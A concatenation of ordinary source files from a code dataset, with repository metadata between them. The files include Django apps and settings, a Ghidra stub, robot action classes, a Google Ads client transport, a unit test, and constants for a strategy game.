address, "%s %s" % (command, path)], stdout=subprocess.PIPE)
s.name = hostname
streams.append(s)
found.add(hostname)
return streams
def read_streams(streams):
while True:
r, _, _ = select.select(
[stream.stdout.fileno() for stream in streams], [], [])
for fileno in r:
for stream in streams:
if stream.stdout.fileno() != fileno:
continue
data = os.read(fileno, 4096)
if not data:
streams.remove(stream)
break
combination_message = "[%-6s] %s" % (stream.name[:6], data)
sys.stdout.write(combination_message)
break
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-f", "--find", dest="find")
parser.add_option("-p", "--path", dest="path")
(options, args) = parser.parse_args()
path = options.path
find = options.find
command = "zgrep \"%s\"" % find
main(role="app", role2="dev", command=command, path=path)
| [
"samuel@ofbrooklyn.com"
] | samuel@ofbrooklyn.com |
537dd076c49ad2ccafc435e3f66ed76126ba6de6 | b1ddcf4bac9ca603a7a2333912eb29da8bf2cb7b | /modelViewset/api/views.py | 7a9e893c1dd960e695c5c68e31de55adba80160d | [] | no_license | sankethalake/django_practice | e9477ae0beee4923cd6758cc6d37517ea5979610 | 9877304f0c6415ae8979e5cc13a49559155fdd9d | refs/heads/main | 2023-07-07T07:07:35.598657 | 2021-08-14T06:26:23 | 2021-08-14T06:26:23 | 389,917,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from .models import Student
from .serializers import StudentSerializer
from rest_framework import viewsets
class StudentModelViewset(viewsets.ModelViewSet):
queryset = Student.objects.all()
serializer_class = StudentSerializer
| [
"sankethalake@gmail.com"
] | sankethalake@gmail.com |
4069cf696c9532eef3b0edf6220845339f5f76ec | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/util/bin/format/dwarf4/next/DWARFRegisterMappingsManager.pyi | ba1a1bbc88343e1b810e395de5dbfa5da91fb33f | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,592 | pyi | import generic.jar
import ghidra.app.util.bin.format.dwarf4.next
import ghidra.program.model.lang
import java.lang
import org.jdom
class DWARFRegisterMappingsManager(object):
"""
Factory class to instantiate and cache DWARFRegisterMappings objects.
"""
def __init__(self): ...
def equals(self, __a0: object) -> bool: ...
def getClass(self) -> java.lang.Class: ...
@staticmethod
def getDWARFRegisterMappingFileFor(lang: ghidra.program.model.lang.Language) -> generic.jar.ResourceFile:
"""
Returns {@link ResourceFile} that should contain the specified language's
DWARF register mapping, never null.
@param lang {@link Language} to find the mapping file for.
@return {@link ResourceFile} of where the mapping file should be, never
null.
@throws IOException if not a Sleigh language or no mapping specified or
multiple mappings specified.
"""
...
@staticmethod
def getMappingForLang(lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
"""
Returns a possibly cached {@link DWARFRegisterMappings} object for the
specified language,
<p>
@param lang {@link Language} to get the matching DWARF register mappings
for
@return {@link DWARFRegisterMappings} instance, never null
@throws IOException if mapping not found or invalid
"""
...
@overload
@staticmethod
def hasDWARFRegisterMapping(lang: ghidra.program.model.lang.Language) -> bool:
"""
Returns true if the specified {@link Language} has DWARF register
mappings.
@param lang The {@link Language} to test
@return true if the language has a DWARF register mapping specified
@throws IOException if there was an error in the language LDEF file.
"""
...
@overload
@staticmethod
def hasDWARFRegisterMapping(langDesc: ghidra.program.model.lang.LanguageDescription) -> bool:
"""
Returns true if the specified {@link LanguageDescription} has DWARF
register mappings.
@param langDesc The {@link LanguageDescription} to test
@return true if the language has a DWARF register mapping specified
@throws IOException if there was an error in the language LDEF file.
"""
...
def hashCode(self) -> int: ...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
@staticmethod
def readMappingForLang(lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
"""
Finds the DWARF register mapping information file specified in the
specified language's LDEF file and returns a new
{@link DWARFRegisterMappings} object containing the data read from that
file.
<p>
Throws {@link IOException} if the lang does not have a mapping or it is
invalid.
<p>
@param lang {@link Language} to read the matching DWARF register mappings
for
@return a new {@link DWARFRegisterMappings} instance, created from
information read from the {@link #DWARF_REGISTER_MAPPING_NAME}
xml file referenced in the language's LDEF, never null.
@throws IOException if there is no DWARF register mapping file associated
with the specified {@link Language} or if there was an error
in the register mapping data.
"""
...
@staticmethod
def readMappingFrom(rootElem: org.jdom.Element, lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
"""
Creates a new {@link DWARFRegisterMappings} from the data present in the
xml element.
<p>
@param rootElem JDom XML element containing the <dwarf> root
element of the mapping file.
@param lang The Ghidra {@link Language} that the DWARF register mapping
applies to
@return a new {@link DWARFRegisterMappings} instance, never null.
@throws IOException if missing or invalid data found in xml
"""
...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
| [
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
e2328cbb036a2a53d77b6c6cc430606a33cc18a4 | c9a4e88111d05cf9db399eba3ae83ddb3b0ad2da | /myapp/models.py | 801590a2819433ea0630630a9b407a91b5cbd1d0 | [] | no_license | Django-TOPS/07JanPython | 7861d9a515e9da951b14f8caa5b1bb0578d99557 | b101e7b2b457250153aedb6a95354e10824ecec5 | refs/heads/master | 2023-04-12T17:08:44.644228 | 2021-05-20T03:30:10 | 2021-05-20T03:30:10 | 369,140,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from django.db import models
# Create your models here.
class signup(models.Model):
firstname=models.CharField(max_length=20)
lastname=models.CharField(max_length=20)
username=models.EmailField()
password=models.CharField(max_length=20)
city=models.CharField(max_length=20)
state=models.CharField(max_length=20)
zipcode=models.IntegerField()
class notes(models.Model):
title=models.CharField(max_length=100)
category=models.CharField(max_length=100)
myfiles=models.FileField(upload_to="FileUpload")
comments=models.TextField()
| [
"sanketiosonline@gmail.com"
] | sanketiosonline@gmail.com |
dd23f81f0523a7ea828de9f8aa5f5cc5ce00d2d7 | c9952dcac5658940508ddc139344a7243a591c87 | /tests/lab18/test_ch018_t01_why_use_classes.py | 89a74ccf8952816be596452943f8010beaf6bc90 | [] | no_license | wongcyrus/ite3101_introduction_to_programming | 5da1c15212528423b3df91997327fe148abef4de | 7cd76d0861d5355db5a6e2e171735bee2e78f829 | refs/heads/master | 2023-08-31T17:27:06.193049 | 2023-08-21T08:30:26 | 2023-08-21T08:30:26 | 136,574,036 | 3 | 2 | null | 2023-08-21T08:30:28 | 2018-06-08T06:06:49 | Python | UTF-8 | Python | false | false | 1,037 | py | import unittest
from tests.unit_test_helper import is_answer
class TestOutput(unittest.TestCase):
def setUp(self):
if is_answer:
from lab.lab18.ch018_t01_why_use_classes_ans import Fruit
else:
from lab.lab18.ch018_t01_why_use_classes import Fruit
self.fruit = Fruit("lemon", "yellow", "sour", False)
def test_member(self):
self.assertEqual("lemon", self.fruit.name)
self.assertEqual("yellow", self.fruit.color)
self.assertEqual("sour", self.fruit.flavor)
self.assertFalse(self.fruit.poisonous)
def test_create_instance(self):
if is_answer:
from lab.lab18.ch018_t01_why_use_classes_ans import lemon
else:
from lab.lab18.ch018_t01_why_use_classes import lemon
self.assertEqual("lemon", lemon.name)
self.assertEqual("yellow", lemon.color)
self.assertEqual("sour", lemon.flavor)
self.assertFalse(lemon.poisonous)
if __name__ == '__main__':
unittest.main()
| [
"cywong@vtc.edu.hk"
] | cywong@vtc.edu.hk |
6896670a52591423610fdfeb8c47a8d739748e56 | 0cfa93ae9bf3b0f4bae9f8ea38bf796d78c3e5cd | /q1.py | 70016330c5a81f74eec305e76dbbc4be028aaab4 | [] | no_license | ahmersayed50/PYTHON | 8fbf40e59b569767895976d343969daa02ac1714 | a0396ec8575520ccda0555ff5549b0c10cdbf9f7 | refs/heads/master | 2020-03-23T17:43:25.768871 | 2018-08-05T05:53:25 | 2018-08-05T05:53:25 | 141,872,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | l1=[1,2,3]
l=(x for x in map(lambda a:a**3,l1))
print(l)
| [
"noreply@github.com"
] | noreply@github.com |
f10aa9ff13f33cbd99be9c6822f4393cb170c568 | 401a03896f05313cc06297760aedfc44499d60e7 | /scripts/test_actions.py | 08bf91ee1bd4fd11cf996bdfd2036d7627993074 | [] | no_license | ccapontep/HumanRobotInteraction_ER | 6d4d3b4440532c1774d964ca4deddb3086083f9e | b74c225cd4700566d3a2aca00b8861ddacddec56 | refs/heads/master | 2020-06-28T00:12:16.524309 | 2019-09-16T14:05:15 | 2019-09-16T14:05:15 | 200,089,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import os, sys
pdir = os.getenv('PNP_HOME')
sys.path.insert(0, pdir+'/PNPnaoqi/actions/')
import action_base
from action_base import *
pdir = os.getenv('PEPPER_TOOLS_HOME')
sys.path.append(pdir+ '/cmd_server')
import pepper_cmd
from pepper_cmd import *
class SayAction(NAOqiAction_Base):
def __init__(self, actionName, session, robot):
NAOqiAction_Base.__init__(self,actionName, session)
self.robot = robot
def actionThread_exec (self, params):
# action init
# action exec
print "Action "+self.actionName+" "+params+" exec..."
self.robot.say(params)
# action end
action_termination(self.actionName,params)
class WaitAction(NAOqiAction_Base):
def actionThread_exec (self, params):
# action init
dt = 0.25
tmax = float(params)
t = 0
# action exec
while (self.do_run and t<tmax):
print "Action "+self.actionName+" "+params+" exec..."
time.sleep(dt)
t += dt
# action end
action_termination(self.actionName,params)
def initActions():
pepper_cmd.begin()
app = pepper_cmd.robot.app # action_base.initApp()
SayAction('say', app.session, pepper_cmd.robot)
WaitAction('wait', app.session)
return app
# Start action server
if __name__ == "__main__":
print("Starting action server (CTRL+C to quit)")
app = initActions()
app.run()
| [
"noreply@github.com"
] | noreply@github.com |
2e1ce2b1f525c0e9d47d6fbdb67c819a692334fb | 245b92f4140f30e26313bfb3b2e47ed1871a5b83 | /airflow/providers/google_vendor/googleads/v12/services/services/customer_feed_service/transports/base.py | 023d30df6c5c442ea4db3635f9ad24a98bee2a10 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ephraimbuddy/airflow | 238d6170a0e4f76456f00423124a260527960710 | 3193857376bc2c8cd2eb133017be1e8cbcaa8405 | refs/heads/main | 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 | Apache-2.0 | 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null | UTF-8 | Python | false | false | 5,984 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from airflow.providers.google_vendor.googleads.v12.services.types import customer_feed_service
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-ads",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class CustomerFeedServiceTransport(abc.ABC):
"""Abstract transport class for CustomerFeedService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
DEFAULT_HOST: str = "googleads.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file,
**scopes_kwargs,
quota_project_id=quota_project_id,
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials are service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(
service_account.Credentials, "with_always_use_jwt_access"
)
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.mutate_customer_feeds: gapic_v1.method.wrap_method(
self.mutate_customer_feeds,
default_timeout=None,
client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def mutate_customer_feeds(
self,
) -> Callable[
[customer_feed_service.MutateCustomerFeedsRequest],
Union[
customer_feed_service.MutateCustomerFeedsResponse,
Awaitable[customer_feed_service.MutateCustomerFeedsResponse],
],
]:
raise NotImplementedError()
__all__ = ("CustomerFeedServiceTransport",)
| [
"noreply@github.com"
] | noreply@github.com |
7d5a0bdd30acb51aa2d53b292d0cadc6076e129e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03068/s875123408.py | 7ebd0a3af325dded24435da6029b158873c69c05 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | n = int(input())
s = list(input())
k = int(input())
ans = ''
for i in range(n):
if s[i] != s[k-1]:
s[i] = '*'
else:
continue
print(*s, sep='') | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
917d87c6ebe1847b901ddff9bf53cbe8ab9c343d | 2132d79e8ade83a89cd8388164cc43e61f8d82ff | /paperboy_django/paperboy/settings.py | 4b3cb8dfb73e6e5f351ac3b43e5d5d439a03ddf1 | [] | no_license | nipa04/BootCamp-Works | ca2721495a948134ed31b020216e5826a77b2597 | 5cae671d5208b7cc8c8f858a7c316c59f64230f0 | refs/heads/master | 2023-01-07T21:54:36.577506 | 2020-01-30T16:58:53 | 2020-01-30T16:58:53 | 232,620,796 | 0 | 0 | null | 2023-01-06T03:47:26 | 2020-01-08T17:33:55 | PLSQL | UTF-8 | Python | false | false | 3,110 | py | """
Django settings for paperboy project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$io*d6*%^09cc5x8m%v=!7^jiy_@gqv4po=tvi=)%hyu9apv#z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'paperboy',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'paperboy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'paperboy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"nipa.farjana04@gmail.com"
] | nipa.farjana04@gmail.com |
13ab7d6e4256db7eb89d0a1f22db287d2d3b6846 | 7c83d54134c71dad7af8afd36db84621dd1fb588 | /lab_2/6.py | 2f0e62bc92bf71d376ecfb49a154cd0157544240 | [] | no_license | khudyakovair/laba | 05fc00de35499c7f344963ad410954bfba3ae67e | 569105937743d4777fa6062ebb0a62b3199f8f8c | refs/heads/main | 2023-01-07T04:40:46.919520 | 2020-10-27T16:28:57 | 2020-10-27T16:28:57 | 307,760,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | h = int(input('Высота пирамидки: '))
str0 = 'X'
str1 = ''
for i in range(h):
for j in range(h*2-1):
if j == h:
str1 += str0
elif j < h - i - 1:
str1 += ' '
str1 += '\n'
str0 += 'XX'
print(str1, end = '')
| [
"noreply@github.com"
] | noreply@github.com |
97f4756fd60a43bb9c96e3865783d92af5ff73ee | 8af00a9c3ab73a6302948bbf320ed301b45cee86 | /src/misc/game_constants.py | 1f5fe3313f4ccf7889262d3588033c4fb5dd018d | [] | no_license | Schiggebam/FightOfAIs3 | 63629592dec3b84ce9268fdb53980ff7500c2451 | baccece6130752b72eb1a026047f8b2519b45110 | refs/heads/master | 2022-06-09T07:59:14.422282 | 2020-05-08T08:00:02 | 2020-05-08T08:00:02 | 254,623,947 | 2 | 2 | null | 2020-05-08T08:00:04 | 2020-04-10T12:00:47 | Python | UTF-8 | Python | false | false | 11,751 | py | from __future__ import annotations
import inspect
import sys
######################
### Game Constants ###
######################
from dataclasses import dataclass
from enum import Enum
from typing import Tuple
import arcade
#####################
### Game Settings ###
#####################
CAMERA_SENSITIVITY = 250
NUM_Z_LEVELS = 5
Z_MAP = 1
Z_AUX = 2
Z_FLYING = 4
Z_GAME_OBJ = 3
ERRORS_ARE_FATAL = False
DEBUG = True
DETAILED_DEBUG_INFO = 1 # 0: no info, 1: includes calling class, 2: includes calling method
ENABLE_KEYFRAME_ANIMATIONS = False
MAP_HACK_ENABLE_AT_STARTUP = False
GAME_LOGIC_CLK_SPEED = 0.75
class Definitions:
VERSION: str = str(0.3)
UI_TEXTURE_PATH = "../resources/other/"
SHOW_AI_CTRL = True
SHOW_STARTUP_CTRL = True
SHOW_STATS_ON_EXIT = True
DEBUG_MODE = True
ALLOW_CONSOLE_CMDS = True
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
########################
### Helper functions ###
########################
def get_caller() -> str:
stack = inspect.stack()
the_class = stack[2][0].f_locals["self"].__class__.__name__
the_method = stack[2][0].f_code.co_name
if DETAILED_DEBUG_INFO == 2:
return "(Class: {} Function: {})".format(the_class, the_method)
elif DETAILED_DEBUG_INFO == 1:
return "(Class: {})".format(the_class)
def debug(msg: str, colour=0):
if not Definitions.DEBUG_MODE:
return
print(msg)
# caller = ""
# if DETAILED_DEBUG_INFO != 0:
# caller = get_caller()
# c = bcolors.OKBLUE
# if colour == 1:
# c = bcolors.OKGREEN
# print("[DEBUG]{} : {}{}{}".format(caller, c, str(msg), bcolors.ENDC))
def hint(msg: str):
caller = ""
if DETAILED_DEBUG_INFO:
caller = get_caller()
print("[HINT]{} : {}{}{}".format(caller, bcolors.WARNING, str(msg), bcolors.ENDC))
def error(msg: str):
caller = ""
if DETAILED_DEBUG_INFO:
try:
caller = get_caller()
except KeyError:
print("unable to get caller object - possible if it is called from 'self'")
if ERRORS_ARE_FATAL:
print("[FATAL]{} : {}{}{}".format(caller, bcolors.FAIL, str(msg), bcolors.ENDC))
sys.exit(-1)
else:
print("[ERROR]{} : {}{}{}".format(caller, bcolors.FAIL, str(msg), bcolors.ENDC))
def start_progress(title):
global progress_x
sys.stdout.write(title + ": [" + "-" * 10 + "]" + chr(8) * 11)
sys.stdout.flush()
progress_x = 0
def progress(x):
global progress_x
x = int(x * 10 // 100)
sys.stdout.write("#" * (x - progress_x))
sys.stdout.flush()
progress_x = x
def end_progress():
sys.stdout.write("#" * (10 - progress_x) + "]\n")
sys.stdout.flush()
#####################
### TYPES ###########
#####################
class Priority(Enum):
P_NO = 0
P_LOW = 1
P_MEDIUM = 2
P_HIGH = 3
P_CRITICAL = 4
@staticmethod
def increase(p: Priority):
if p is Priority.P_NO:
return Priority.P_LOW
elif p is Priority.P_LOW:
return Priority.P_MEDIUM
elif p is Priority.P_MEDIUM:
return Priority.P_HIGH
return Priority.P_CRITICAL
@staticmethod
def decrease(p: Priority):
if p is Priority.P_CRITICAL:
return Priority.P_HIGH
elif p is Priority.P_HIGH:
return Priority.P_MEDIUM
elif p is Priority.P_MEDIUM:
return Priority.P_LOW
return Priority.P_NO
class PlayerType(Enum):
AI = 0
BARBARIC = 1
VILLAGER = 2
HUMAN = 3
@staticmethod
def get_type_from_strcode(str_code: str) -> PlayerType:
if str_code == "barbaric":
return PlayerType.BARBARIC
elif str_code == "villager":
return PlayerType.VILLAGER
elif str_code == "human":
return PlayerType.HUMAN
else:
return PlayerType.AI
# logs
class LogType(Enum):
BATTLE_ARMY_VS_ARMY = 900
BATTLE_ARMY_VS_BUILDING = 901
DIPLO_ENEMY_BUILDING_SCOUTED = 902
NOTIFICATION = 903
# ground
class GroundType(Enum):
GRASS = 0
WATER_DEEP = 1
STONE = 2
OTHER = 3
MIXED = 4 # currently a workaround for mixed tiles which are walkable and buildable
# (they have no associated str_code)
@staticmethod
def get_type_from_strcode(str_code: str) -> GroundType:
if str_code == "gr" or str_code == "gc":
return GroundType.GRASS
elif str_code == "st":
return GroundType.STONE
elif str_code == "wd":
return GroundType.WATER_DEEP
return GroundType.OTHER
# buildings
class BuildingType(Enum):
HUT = 20
FARM = 21
CAMP_1 = 22
CAMP_2 = 23
CAMP_3 = 24
VILLA = 25
VILLAGE_1 = 26
VILLAGE_2 = 27
VILLAGE_3 = 28
BARRACKS = 29
OTHER_BUILDING = 30
@staticmethod
def get_type_from_strcode(str_code: str) -> BuildingType:
if str_code == "s1":
return BuildingType.HUT
elif str_code == "s2":
return BuildingType.VILLA
elif str_code == "fa":
return BuildingType.FARM
elif str_code == "c1":
return BuildingType.CAMP_1
elif str_code == "c2":
return BuildingType.CAMP_2
elif str_code == "c3":
return BuildingType.CAMP_3
elif str_code == "vl1":
return BuildingType.VILLAGE_1
elif str_code == "vl2":
return BuildingType.VILLAGE_2
elif str_code == "vl3":
return BuildingType.VILLAGE_3
elif str_code == "br":
return BuildingType.BARRACKS
return BuildingType.OTHER_BUILDING
class ResourceType(Enum):
ROCK = 10
GOLD = 11
FOREST = 12
OTHER_RESOURCE = 19
@staticmethod
def get_type_from_strcode(str_code: str) -> ResourceType:
if str_code == "r1":
return ResourceType.ROCK
elif str_code == "g1":
return ResourceType.GOLD
elif str_code == "f1":
return ResourceType.FOREST
return ResourceType.OTHER_RESOURCE
class DiploEventType(Enum):
TYPE_ENEMY_ARMY_INVADING = 100
TYPE_ENEMY_BUILDING_SCOUTED = 101
ENEMY_BUILDING_IN_CLAIMED_ZONE = 102
ENEMY_ARMY_INVADING_CLAIMED_ZONE = 103
ATTACKED_BY_FACTION = 104
PROTECTIVE_ARMY_SPOTTED = 105
# ---- TRADE EVENTS ---
RECEIVED_GIFT = 116
RECEIVED_CLAIM = 117
DONE_DEAL = 118
@staticmethod
def get_event_description(event: DiploEventType, loc: Tuple[int, int]):
if event is DiploEventType.TYPE_ENEMY_BUILDING_SCOUTED:
return "Enemy building scouted at: " + str(loc)
elif event is DiploEventType.TYPE_ENEMY_ARMY_INVADING:
return "Enemy army scouted at: " + str(loc)
elif event is DiploEventType.ENEMY_BUILDING_IN_CLAIMED_ZONE:
return "Enemy building is located in claimed zone"
elif event is DiploEventType.ENEMY_ARMY_INVADING_CLAIMED_ZONE:
return "Enemy army is invading claimed zone"
elif event is DiploEventType.ATTACKED_BY_FACTION:
return "Attacked by Faction"
elif event is DiploEventType.PROTECTIVE_ARMY_SPOTTED:
return "Protection by army"
else:
return event.name
class UnitType(Enum):
KNIGHT = 0
MERCENARY = 1
BABARIC_SOLDIER = 2
@staticmethod
def get_type_from_strcode(str_code: str):
if str_code == "unit_a":
return UnitType.MERCENARY
elif str_code == "unit_b":
return UnitType.KNIGHT
elif str_code == "unit_c":
return UnitType.BABARIC_SOLDIER
return -1
class TradeType(Enum):
"""in a gift, specify only the offer of the trade. Nothing is given in return"""
GIFT = 220
"""normal offer, where both demand and offer are specified"""
OFFER = 221
"""only the demand is specified.
make sure to set the target_id field in AI_Trade if a specific player is targeted"""
CLAIM = 222
class TradeCategory(Enum):
RESOURCE = 210
CULTURE = 211
FOOD = 212
class PlayerColour(Enum):
YELLOW = 60
TEAL = 61
RED = 62
BLUE = 63
GREEN = 64
PINK = 65
NO_COLOUR = 69
@staticmethod
def get_type_from_strcode(str_code: str) -> PlayerColour:
if str_code == "yellow":
return PlayerColour.YELLOW
elif str_code == "red":
return PlayerColour.RED
elif str_code == "teal":
return PlayerColour.TEAL
elif str_code == "pink":
return PlayerColour.PINK
elif str_code == "green":
return PlayerColour.GREEN
elif str_code == "blue":
return PlayerColour.BLUE
return PlayerColour.NO_COLOUR
@staticmethod
def player_colour_to_arcade_colour(colour: PlayerColour) -> arcade.Color:
if colour == PlayerColour.YELLOW:
return arcade.color.YELLOW
elif colour == PlayerColour.TEAL:
return arcade.color.PALE_BLUE
elif colour == PlayerColour.RED:
return arcade.color.RED
elif colour == PlayerColour.PINK:
return arcade.color.PINK
elif colour == PlayerColour.BLUE:
return arcade.color.BLUE
elif colour == PlayerColour.GREEN:
return arcade.color.GREEN
@staticmethod
def get_colour_code(colour: PlayerColour) -> str:
if colour == PlayerColour.YELLOW:
return 'yellow'
elif colour == PlayerColour.TEAL:
return 'teal'
elif colour == PlayerColour.RED:
return 'red'
elif colour == PlayerColour.PINK:
return 'pink'
elif colour == PlayerColour.BLUE:
return 'blue'
elif colour == PlayerColour.GREEN:
return 'green'
return 'no_colour'
class MoveType(Enum):
""" does not required any additional fields to be set"""
DO_NOTHING = 230
"""requires the 'loc' field to be set, indicating the location of the hexagon to be scouted"""
DO_SCOUT = 231
"""requires the 'loc' field to be set, indicating the location of the building to be upgraded"""
DO_UPGRADE_BUILDING = 232
"""requires the 'loc' field to be set, indicating the location of the building site
also, requires the 'type' field to specify the Type of the building"""
DO_BUILD = 233
"""requires the 'type' field to be set, indicating the UnitType"""
DO_RECRUIT_UNIT = 234
"""requires the 'loc' field to be set, indicating the hexagon were the new army should appear"""
DO_RAISE_ARMY = 235
class BattleAfterMath(Enum):
ATTACKER_WON = 0
DEFENDER_WON = 1
DRAW = 2
###################
### Dataclasses ###
###################
@dataclass
class UnitCost:
resources: int
culture: int
population: int
###############
### STATES ####
###############
